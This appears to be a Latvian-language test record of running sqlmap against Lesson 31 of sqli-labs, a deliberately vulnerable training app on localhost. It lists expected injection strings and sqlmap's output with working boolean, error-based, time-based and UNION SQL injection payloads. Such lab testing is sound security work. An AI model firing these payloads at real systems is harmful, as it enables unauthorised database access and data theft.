=================================================================================
1. Īpašība: piemēra sqli-labs12 variācija, tikai šeit kļūdas gadījumā ziņojums parādās tur pat, kur rezultāts
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?id=-1") OR ("1"="1
3.2. error-based: ?id=-1")
3.3. time-based: ?id=-1") or sleep(1)-- -
3.4. union: ?id=-1") union select 1,2,3-- -
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 2546848 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-31/?id=1" -p id -risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1") AND 8459=8459 AND ("Gxzj"="Gxzj

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1") AND GTID_SUBSET(CONCAT(0x7178717071,(SELECT (ELT(4959=4959,1))),0x716b626271),4959) AND ("DcHo"="DcHo

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1") AND (SELECT 9941 FROM (SELECT(SLEEP(5)))GcmN) AND ("mwYh"="mwYh

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8300") UNION ALL SELECT NULL,CONCAT(0x7178717071,0x5a6e69506e6f4574677768506855797a546d4244794c43484d6b4855425562434558435466436f61,0x716b626271),NULL-- -
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.6
